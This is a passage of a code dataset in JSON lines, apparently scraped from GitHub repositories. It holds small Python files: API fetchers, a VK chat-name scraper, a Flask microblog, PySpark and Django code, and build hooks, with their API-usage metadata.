"call"}, {"api_name": "matplotlib.pyplot", "line_number": 652, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 653, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 653, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 654, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 654, "usage_type": "name"}, {"api_name": "librosa.display.load", "line_number": 658, "usage_type": "call"}, {"api_name": "librosa.display", "line_number": 658, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 659, "usage_type": "call"}, {"api_name": "os.path", "line_number": 659, "usage_type": "attribute"}, {"api_name": "librosa.display.effects.trim", "line_number": 661, "usage_type": "call"}, {"api_name": "librosa.display.effects", "line_number": 661, "usage_type": "attribute"}, {"api_name": "librosa.display", "line_number": 661, "usage_type": "name"}, {"api_name": "os.remove", "line_number": 682, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 682, "usage_type": "call"}, {"api_name": "os.path", "line_number": 682, "usage_type": "attribute"}, {"api_name": "numpy.random.choice", "line_number": 694, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 694, "usage_type": "attribute"}, {"api_name": "numpy.arange", "line_number": 695, "usage_type": "call"}, {"api_name": "librosa.display.effects.trim", "line_number": 710, "usage_type": "call"}, {"api_name": "librosa.display.effects", "line_number": 710, "usage_type": "attribute"}, {"api_name": "librosa.display", "line_number": 710, "usage_type": "name"}, {"api_name": "os.remove", "line_number": 724, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 724, "usage_type": "call"}, {"api_name": "os.path", "line_number": 724, "usage_type": "attribute"}, {"api_name": "constants.base_data_path", "line_number": 743, "usage_type": "name"}, {"api_name": "constants.base_data_path", "line_number": 745, "usage_type": "name"}, {"api_name": "os.path.isfile", "line_number": 747, "usage_type": "call"}, {"api_name": "os.path", "line_number": 747, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 747, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 752, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 752, "usage_type": "call"}, {"api_name": "os.path", "line_number": 752, "usage_type": "attribute"}, {"api_name": "multiprocessing.cpu_count", "line_number": 753, "usage_type": "call"}, {"api_name": "joblib.Parallel", "line_number": 756, "usage_type": "call"}, {"api_name": "joblib.delayed", "line_number": 757, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 759, "usage_type": "call"}, {"api_name": "joblib.Parallel", "line_number": 782, "usage_type": "call"}, {"api_name": "joblib.delayed", "line_number": 783, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 784, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 789, "usage_type": "call"}, {"api_name": "os.path", "line_number": 789, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 790, "usage_type": "call"}, {"api_name": "numpy.save", "line_number": 792, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 792, "usage_type": "call"}, {"api_name": "os.path", "line_number": 792, "usage_type": "attribute"}, {"api_name": "librosa.display.load", "line_number": 805, "usage_type": "call"}, {"api_name": "librosa.display", "line_number": 805, "usage_type": "name"}, {"api_name": "librosa.display.effects.trim", "line_number": 807, "usage_type": "call"}, {"api_name": "librosa.display.effects", "line_number": 807, "usage_type": "attribute"}, {"api_name": "librosa.display", "line_number": 807, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 818, "usage_type": "call"}, {"api_name": "os.path", "line_number": 818, "usage_type": "attribute"}, {"api_name": "numpy.ndarray", "line_number": 819, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 820, "usage_type": "call"}, {"api_name": "os.path", "line_number": 820, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 822, "usage_type": "call"}, {"api_name": "os.path", "line_number": 822, "usage_type": "attribute"}, {"api_name": "tqdm.tqdm", "line_number": 844, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 862, "usage_type": "call"}, {"api_name": "os.path", "line_number": 862, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 864, "usage_type": "call"}, {"api_name": "os.path", "line_number": 864, "usage_type": "attribute"}, {"api_name": "soundfile.SoundFile", "line_number": 865, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 871, "usage_type": "call"}, {"api_name": "os.path", "line_number": 871, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 873, "usage_type": "call"}, {"api_name": "os.path", "line_number": 873, "usage_type": "attribute"}, {"api_name": "soundfile.SoundFile", "line_number": 874, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 885, "usage_type": "call"}, {"api_name": "multiprocessing.cpu_count", "line_number": 890, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 901, "usage_type": "call"}, {"api_name": "os.path", "line_number": 901, "usage_type": "attribute"}, {"api_name": "joblib.delayed", "line_number": 911, "usage_type": "call"}, {"api_name": "joblib.Parallel", "line_number": 923, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 967, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 967, "usage_type": "call"}, {"api_name": "os.path", "line_number": 967, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 975, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 975, "usage_type": "call"}, {"api_name": "os.path", "line_number": 975, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 976, "usage_type": "call"}, {"api_name": "os.path", "line_number": 976, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 976, "usage_type": "call"}, {"api_name": "constants.base_data_path", "line_number": 977, "usage_type": "name"}, {"api_name": "tqdm.tqdm", "line_number": 983, "usage_type": "call"}, {"api_name": "librosa.display.load", "line_number": 984, "usage_type": "call"}, {"api_name": "librosa.display", "line_number": 984, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 984, "usage_type": "call"}, {"api_name": "os.path", "line_number": 984, "usage_type": "attribute"}, {"api_name": "librosa.display.effects.trim", "line_number": 988, "usage_type": "call"}, {"api_name": "librosa.display.effects", "line_number": 988, "usage_type": "attribute"}, {"api_name": "librosa.display", "line_number": 988, "usage_type": "name"}, {"api_name": "os.remove", "line_number": 1012, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 1012, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1012, "usage_type": "attribute"}, {"api_name": "os.path.isdir", "line_number": 1014, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1014, "usage_type": "attribute"}, {"api_name": "constants.base_data_path", "line_number": 1014, "usage_type": "name"}, {"api_name": "os.mkdir", "line_number": 1015, "usage_type": "call"}, {"api_name": "constants.base_data_path", "line_number": 1015, "usage_type": "name"}, {"api_name": "numpy.save", "line_number": 1017, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 1017, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1017, "usage_type": "attribute"}, {"api_name": "constants.base_data_path", "line_number": 1018, "usage_type": "name"}, {"api_name": "os.listdir", "line_number": 1031, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 1031, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1031, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 1032, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1032, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 1032, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 1039, "usage_type": "call"}, {"api_name": "librosa.display.load", "line_number": 1040, "usage_type": "call"}, {"api_name": "librosa.display", "line_number": 1040, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 1040, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1040, "usage_type": "attribute"}, {"api_name": "librosa.display.effects.trim", "line_number": 1044, "usage_type": "call"}, {"api_name": "librosa.display.effects", "line_number": 1044, "usage_type": "attribute"}, {"api_name": "librosa.display", "line_number": 1044, "usage_type": "name"}, {"api_name": "librosa.display.feature.melspectrogram", "line_number": 1045, "usage_type": "call"}, {"api_name": "librosa.display.feature", "line_number": 1045, "usage_type": "attribute"}, {"api_name": "librosa.display", "line_number": 1045, "usage_type": "name"}, {"api_name": "constants.model_params", "line_number": 1047, "usage_type": "name"}, {"api_name": "os.remove", "line_number": 1065, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 1065, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1065, "usage_type": "attribute"}, {"api_name": "os.path.isdir", "line_number": 1067, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1067, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 1067, "usage_type": "call"}, {"api_name": "os.mkdir", "line_number": 1068, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 1068, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1068, "usage_type": "attribute"}, {"api_name": "numpy.save", "line_number": 1070, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 1070, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1070, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.hist", "line_number": 1083, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1083, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 1084, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1084, "usage_type": "name"}, {"api_name": "os.walk", "line_number": 1090, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 1093, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1093, "usage_type": "attribute"}, {"api_name": "pydub.AudioSegment.from_wav", "line_number": 1094, "usage_type": "call"}, {"api_name": "pydub.AudioSegment", "line_number": 1094, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 1098, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 1103, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 1110, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 1111, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 1114, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 1114, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 1122, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 1129, "usage_type": "call"}, {"api_name": "numpy.random.randint", "line_number": 1135, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 1135, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 1166, "usage_type": "call"}, {"api_name": "sklearn.metrics.f1_score", "line_number": 1169, "usage_type": "call"}, {"api_name": "foundations.log_metric", "line_number": 1179, "usage_type": "call"}, {"api_name": "foundations.log_metric", "line_number": 1180, "usage_type": "call"}, {"api_name": "constants.model_params", "line_number": 1192, "usage_type": "name"}, {"api_name": "numpy.ceil", "line_number": 1208, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 1216, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 1228, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 1230, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 1232, "usage_type": "call"}]} +{"seq_id": "71567644649", "text": "import requests\r\nimport random\r\n\r\ndef monster():\r\n response2 = requests.get('http://www.dnd5eapi.co/api/monsters')\r\n a2 = response2.json()\r\n\r\n lista2 = a2['results']\r\n\r\n c = len(lista2) - 1\r\n monsters = []\r\n for item in lista2:\r\n monsters.append(lista2[c]['index'])\r\n c -= 1\r\n\r\n random_monster = random.choice(monsters)\r\n response3 = requests.get('http://www.dnd5eapi.co/api/monsters/'+ random_monster)\r\n d = response3.json()\r\n print('Name: {}, Type: {}, Hit points: {}, Hit dice: {}, Armor class: {}'.format(d['name'], d['type'], d['hit_points'], d['hit_dice'], d['armor_class']))\r\n\r\n\r\n\r\n", "repo_name": "Babalmar/D-D-Requests", "sub_path": "monsters.py", "file_name": "monsters.py", "file_ext": "py", "file_size_in_byte": 633, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "requests.get", "line_number": 5, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 16, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 17, "usage_type": "call"}]} +{"seq_id": "25705455774", "text": "from selenium import webdriver\r\nfrom time import sleep\r\nimport json\r\n\r\ndriver = webdriver.Chrome(r'C:\\\\chromedriver_95.0.4638.54.exe')\r\ndriver.get(\"https://vk.com\")\r\n\r\nauth = input(\"Press any key when you have login to your page...\")\r\ncount = int(input(\"Enter how a lot of chats you wanna check (number): \"))\r\nkeyword = input(\"Enter keyword to find if you want: \")\r\n\r\nchats = {}\r\nfor x in range(1, count+1):\r\n try:\r\n driver.get(f\"https://vk.com/im?sel=c{x}\")\r\n sleep(2)\r\n \r\n element = driver.find_element_by_xpath('//a[@class=\"im-page--title-main-inner _im_page_peer_name\"]')\r\n chatname = element.get_attribute(\"innerHTML\").replace(\" \",\"\")\r\n chats[x]=chatname\r\n \r\n if keyword in chatname:\r\n exit()\r\n \r\n x+=1\r\n except Exception:\r\n pass\r\nwith open(\"chats.json\",\"w\", encoding='utf8') as file:\r\n json.dump(chats,file,ensure_ascii=False)", "repo_name": "syaveloo/demonstration", "sub_path": "chats/give_me_my_chats_vk.py", "file_name": "give_me_my_chats_vk.py", "file_ext": "py", "file_size_in_byte": 934, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "selenium.webdriver.Chrome", "line_number": 5, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 5, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 16, "usage_type": "call"}, {"api_name": "json.dump", "line_number": 29, "usage_type": "call"}]} +{"seq_id": "37094566010", "text": "#This program prints one date minus of the date provided to the user.\n#Give input as\n#1\tno of testcases\n#24 April 1994\ttest cases\nimport datetime\nfrom datetime import date, timedelta\nn = input();\nwhile n > 0:\n\tdate = raw_input(); day, month, year = date.split();\n\tassert(int(day) > 0 & int(day) < 31)\n\t#print(day+\" \"+month+\" \"+year)\n\tmap = {'January':1, 'February':2, 'March':3, 'April':4, 'May':5, 'June':6, 'July':7, 'August':8, 'September':9, \t\t'October':10, 'November':11, 'December':12}\n\tmlist = ['January', 'February', 'March', 'April', 'May', 'June', 'July', 'August', 'September', 'October', 'November', \t\t\t'December']\n\tmydate = (datetime.date(int(year), map[month], int(day))) #year, month, day\n\t#mydate =mydate+datetime.timedelta(years=40)\n\tmydate = mydate - datetime.timedelta(days = 1)\n\tmydate = mydate.isoformat();\n\t#print(mydate)\n\tyear, month, day = mydate.split('-')\n\t#print(year+\" \"+month+\" \"+day)\n\t#print(mydate.strftime(\"%Y-%m-%d\"))\n\t#year = mydate.strftime(\"%Y\");\n\tif(int(month) < 10):\tmonth = month.strip(\"0\");\n\t#day = mydate.strftime(\"%d\");\n\tif(int(day) < 10):\tday = day.strip(\"0\")\n\t#print(month);\n\tprint(day + \" \" + mlist[int(month) - 1] + \" \" + year);\n\tn -= 1;\n", "repo_name": "pushkarlaulkar/competitiveprogramming", "sub_path": "printpreviousdate.py", "file_name": "printpreviousdate.py", "file_ext": "py", "file_size_in_byte": 1185, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "datetime.date", "line_number": 9, "usage_type": "name"}, {"api_name": "datetime.date.split", "line_number": 9, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 14, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 16, "usage_type": "call"}]} +{"seq_id": "33753704375", "text": "# flaskr microblogging app\n\nimport dataset\n\nfrom flask import Flask, request, session, g, redirect, url_for, abort, render_template, flash\n\n# connecting to a SQLite database\ndb = dataset.connect('sqlite:///myflaskr.db')\ntable = db['postings']\n\n# create the application\napp = Flask(__name__)\n\n# show all the posting\n\n\n@app.route(\"/\")\ndef show_postings():\n postings = table.find() # to reverse order, table.find(order_by='-id')\n return render_template('show_postings.html', postings=postings)\n\n\n@app.route(\"/add\", methods=['POST']) # only accept connections which POST\ndef add_posting():\n table.insert(dict(title=request.form['title'], text=request.form['text']))\n flash(\"New posting successful\")\n return redirect(url_for('show_postings'))\n\nif __name__ == '__main__':\n app.debug = \"TRUE\"\n app.secret_key = \"secret\"\n app.run()\n", "repo_name": "oatnog/flaskr", "sub_path": "flaskr.py", "file_name": "flaskr.py", "file_ext": "py", "file_size_in_byte": 848, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "dataset.connect", "line_number": 8, "usage_type": "call"}, {"api_name": "flask.Flask", "line_number": 12, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 20, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 25, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 25, "usage_type": "name"}, {"api_name": "flask.flash", "line_number": 26, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 27, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 27, "usage_type": "call"}]} +{"seq_id": "23876414383", "text": "#qzznb!\nfrom __future__ import print_function\nfrom pyspark import SparkContext\nimport json\ndef fun(record):\n if record[0] == 'a':\n return (record[2],record)\n elif record[0] == 'b':\n return (record[1],record)\n\ndef mul(lists):\n sz = len(lists)\n res = []\n for x in range(sz):\n for y in range(x+1,sz):\n #print(x,y)\n #print(lists[x][0],lists[y][0])\n \n if lists[x][0] == \"a\" and lists[y][0] == \"b\":\n res.append(((lists[x][1],lists[y][2]),lists[x][3]*lists[y][3]))\n elif lists[x][0] == \"b\" and lists[y][0] == \"a\":\n res.append(((lists[y][1],lists[x][2]),lists[x][3]*lists[y][3]))\n \n return res\n\nsc = SparkContext('local', 'test')\ntextFile = sc.textFile(\"file:///root/bigdata/inputs//6.json\")\nans = textFile.map(lambda row: fun(json.loads(row))).groupByKey().flatMap(lambda x: mul(list(x[1]))).reduceByKey(lambda x,y:x+y).map(lambda x: [[x[0][0],x[0][1]],x[1]])\nans.foreach(print)\n", "repo_name": "Ryan0v0/BUAA_BigDataCourse", "sub_path": "problem6/pyspark/problem6_spark.py", "file_name": "problem6_spark.py", "file_ext": "py", "file_size_in_byte": 1007, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 7, "dataset": "github-code", "pt": "53", "api": [{"api_name": "pyspark.SparkContext", "line_number": 26, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 28, "usage_type": "call"}]} +{"seq_id": "21651703787", "text": "from helper.cEmbed import granted_msg, denied_msg\n\nclass LeaderBoard():\n def Standings(self, lst):\n i = 1\n ids = handles = ratings = \"\"\n for (h, r) in sorted(lst, key = lambda x: x[1], reverse = True):\n ids += \"**\" + str(i) + \"**\" +'\\n'\n if i == 1: handles += h + \":crown:\" + \"\\n\"\n else: handles += h + \"\\n\"\n ratings += str(r) + \"\\n\"\n i += 1\n\n if len(ids) == 0: return denied_msg(\"Warning\", \"The Leaderboard is Still Empty.\")\n\n response = granted_msg(\"CodeForces Standings\")\n\n response.add_field(name = \"#\", value = ids, inline = True)\n response.add_field(name = \"Handle\", value = handles, inline = True)\n response.add_field(name = \"Rating\", value = ratings, inline = True)\n\n return response\n", "repo_name": "KhaledChehabeddine/aub_cp_discord_bot", "sub_path": "helper/LeaderBoard.py", "file_name": "LeaderBoard.py", "file_ext": "py", "file_size_in_byte": 812, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "helper.cEmbed.denied_msg", "line_number": 14, "usage_type": "call"}, {"api_name": "helper.cEmbed.granted_msg", "line_number": 16, "usage_type": "call"}]} +{"seq_id": "4931263659", "text": "import random\nimport string\n\nfrom django.db import models\nfrom django.contrib.auth.models import AbstractUser, UserManager\n\n\nclass AdminManager(UserManager):\n def get_queryset(self):\n return super().get_queryset().filter(is_superuser=True)\n\n\nclass User(AbstractUser):\n class Type(models.IntegerChoices):\n USER = 0, 'Пользователь без прав'\n VERIFIED = 1, 'Пользователь'\n ADMIN = 2, 'Администратор'\n\n users = UserManager()\n admins = AdminManager()\n type = models.IntegerField(default=Type.USER, choices=Type.choices)\n date_of_birth = models.DateField(null=True)\n token = models.CharField(max_length=255, default='')\n\n def update_token(self):\n token = str()\n for _ in range(20):\n token += random.choice(string.ascii_letters+string.digits)\n\n self.token = token\n self.save()\n\n def __str__(self):\n return str(self.username)\n\n\nclass Platform(models.Model):\n platforms = models.Manager()\n name = models.CharField(\n max_length=255,\n unique=True,\n verbose_name='Название',\n )\n created = models.DateTimeField(auto_now_add=True,\n verbose_name='Дата создания')\n updated = models.DateTimeField(auto_now=True,\n verbose_name='Дата изменения')\n\n class Meta:\n verbose_name = 'Платформа'\n verbose_name_plural = 'Платформы'\n\n def __str__(self):\n return self.name\n\n\nclass Category(models.Model):\n platform = models.ForeignKey(\n to=Platform,\n on_delete=models.CASCADE,\n related_name='categories',\n verbose_name='Платформа',\n )\n name = models.CharField(\n max_length=255,\n unique=True,\n verbose_name='Название',\n )\n description = models.CharField(\n max_length=255,\n verbose_name='Описание категории',\n null=True,\n blank=True,\n )\n parent = models.ForeignKey(\n to='self',\n on_delete=models.CASCADE,\n related_name='children',\n null=True,\n blank=True,\n verbose_name='Родитель',\n )\n xml_feed = models.CharField(\n max_length=255,\n verbose_name='Значение для XML фида',\n null=True,\n blank=True,\n )\n created = models.DateTimeField(auto_now_add=True,\n verbose_name='Дата создания')\n updated = models.DateTimeField(auto_now=True,\n verbose_name='Дата изменения')\n\n class Meta:\n verbose_name = 'Категория'\n verbose_name_plural = 'Категории'\n\n def get_full_name(self):\n name_list = [self.name]\n parent = self.parent\n while parent:\n name_list.append(parent.name)\n parent = parent.parent\n\n full_name = ' - '.join(reversed(name_list))\n return full_name\n\n def __str__(self):\n return self.name\n\n\nclass Project(models.Model):\n uid = models.IntegerField()\n projects = models.Manager()\n platform = models.ForeignKey(\n to=Platform,\n on_delete=models.CASCADE,\n related_name='projects',\n )\n user = models.ForeignKey(\n to=User,\n on_delete=models.CASCADE,\n related_name='projects',\n )\n name = models.CharField(max_length=255, verbose_name='Название')\n created = models.DateTimeField(auto_now_add=True,\n verbose_name='Дата создания')\n updated = models.DateTimeField(auto_now=True,\n verbose_name='Дата изменения')\n\n class Meta:\n verbose_name = 'Проект'\n verbose_name_plural = 'Проекты'\n\n def __str__(self):\n return self.name\n\n\nclass ProjectCategory(models.Model):\n project = models.ForeignKey(\n to=Project,\n on_delete=models.CASCADE,\n related_name='categories',\n )\n category = models.ForeignKey(Category, on_delete=models.CASCADE)\n\n created = models.DateTimeField(auto_now_add=True,\n verbose_name='Дата создания')\n updated = models.DateTimeField(auto_now=True,\n verbose_name='Дата изменения')\n", "repo_name": "archon1999/PlatformXMLGenerator", "sub_path": "app/apps/backend/models.py", "file_name": "models.py", "file_ext": "py", "file_size_in_byte": 4445, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "django.contrib.auth.models.UserManager", "line_number": 8, "usage_type": "name"}, {"api_name": "django.contrib.auth.models.AbstractUser", "line_number": 13, "usage_type": "name"}, {"api_name": "django.db.models.IntegerChoices", "line_number": 14, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 14, "usage_type": "name"}, {"api_name": "django.contrib.auth.models.UserManager", "line_number": 19, "usage_type": "call"}, {"api_name": "django.db.models.IntegerField", "line_number": 21, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 21, "usage_type": "name"}, {"api_name": "django.db.models.DateField", "line_number": 22, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 22, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 23, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 23, "usage_type": "name"}, {"api_name": "random.choice", "line_number": 28, "usage_type": "call"}, {"api_name": "string.ascii_letters", "line_number": 28, "usage_type": "attribute"}, {"api_name": "string.digits", "line_number": 28, "usage_type": "attribute"}, {"api_name": "django.db.models.Model", "line_number": 37, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 37, "usage_type": "name"}, {"api_name": "django.db.models.Manager", "line_number": 38, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 38, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 39, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 39, "usage_type": "name"}, {"api_name": "django.db.models.DateTimeField", "line_number": 44, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 44, "usage_type": "name"}, {"api_name": "django.db.models.DateTimeField", "line_number": 46, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 46, "usage_type": "name"}, {"api_name": "django.db.models.Model", "line_number": 57, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 57, "usage_type": "name"}, {"api_name": "django.db.models.ForeignKey", "line_number": 58, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 58, "usage_type": "name"}, {"api_name": "django.db.models.CASCADE", "line_number": 60, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 60, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 64, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 64, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 69, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 69, "usage_type": "name"}, {"api_name": "django.db.models.ForeignKey", "line_number": 75, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 75, "usage_type": "name"}, {"api_name": "django.db.models.CASCADE", "line_number": 77, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 77, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 83, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 83, "usage_type": "name"}, {"api_name": "django.db.models.DateTimeField", "line_number": 89, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 89, "usage_type": "name"}, {"api_name": "django.db.models.DateTimeField", "line_number": 91, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 91, "usage_type": "name"}, {"api_name": "django.db.models.Model", "line_number": 112, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 112, "usage_type": "name"}, {"api_name": "django.db.models.IntegerField", "line_number": 113, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 113, "usage_type": "name"}, {"api_name": "django.db.models.Manager", "line_number": 114, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 114, "usage_type": "name"}, {"api_name": "django.db.models.ForeignKey", "line_number": 115, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 115, "usage_type": "name"}, {"api_name": "django.db.models.CASCADE", "line_number": 117, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 117, "usage_type": "name"}, {"api_name": "django.db.models.ForeignKey", "line_number": 120, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 120, "usage_type": "name"}, {"api_name": "django.db.models.CASCADE", "line_number": 122, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 122, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 125, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 125, "usage_type": "name"}, {"api_name": "django.db.models.DateTimeField", "line_number": 126, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 126, "usage_type": "name"}, {"api_name": "django.db.models.DateTimeField", "line_number": 128, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 128, "usage_type": "name"}, {"api_name": "django.db.models.Model", "line_number": 139, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 139, "usage_type": "name"}, {"api_name": "django.db.models.ForeignKey", "line_number": 140, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 140, "usage_type": "name"}, {"api_name": "django.db.models.CASCADE", "line_number": 142, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 142, "usage_type": "name"}, {"api_name": "django.db.models.ForeignKey", "line_number": 145, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 145, "usage_type": "name"}, {"api_name": "django.db.models.CASCADE", "line_number": 145, "usage_type": "attribute"}, {"api_name": "django.db.models.DateTimeField", "line_number": 147, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 147, "usage_type": "name"}, {"api_name": "django.db.models.DateTimeField", "line_number": 149, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 149, "usage_type": "name"}]} +{"seq_id": "34046069669", "text": "\"\"\"\nPEP 517 build hooks\n\"\"\"\n\n\nfrom __future__ import annotations\nfrom typing import Mapping, Any\nimport os\nimport setuptools.build_meta as build_meta\n\n__all__ = [\n \"_supported_features\",\n \"build_sdist\",\n \"build_wheel\",\n \"build_editable\",\n \"get_requires_for_build_sdist\",\n \"get_requires_for_build_wheel\",\n \"get_requires_for_build_editable\",\n \"prepare_metadata_for_build_wheel\",\n \"prepare_metadata_for_build_editable\",\n]\n\nfrom pathlib import Path\nfrom loguru import logger\n\nfrom .project import Project\n\n\ndef _supported_features():\n return [\"build_editable\"]\n\n\ndef build_sdist(\n sdist_directory: str,\n config_settings: dict[str, list[str] | str] | None = None,\n) -> str:\n logger.debug(\"Build hook: build_sdist\")\n return build_meta.build_sdist(sdist_directory, config_settings)\n\n\ndef build_wheel(\n wheel_directory: str,\n config_settings: dict[str, list[str] | str] | None = None,\n metadata_directory: str | None = None,\n) -> str:\n logger.debug(\"Build hook: build_wheel\")\n logger.debug(f\"wheel_directory: {wheel_directory}\")\n project = Project(Path.cwd())\n return project.build_wheel(wheel_directory, config_settings, metadata_directory)\n\n\ndef build_editable(\n wheel_directory: str,\n config_settings: dict[str, list[str] | str] | None = None,\n metadata_directory: str | None = None,\n) -> str:\n logger.debug(\"Build hook: 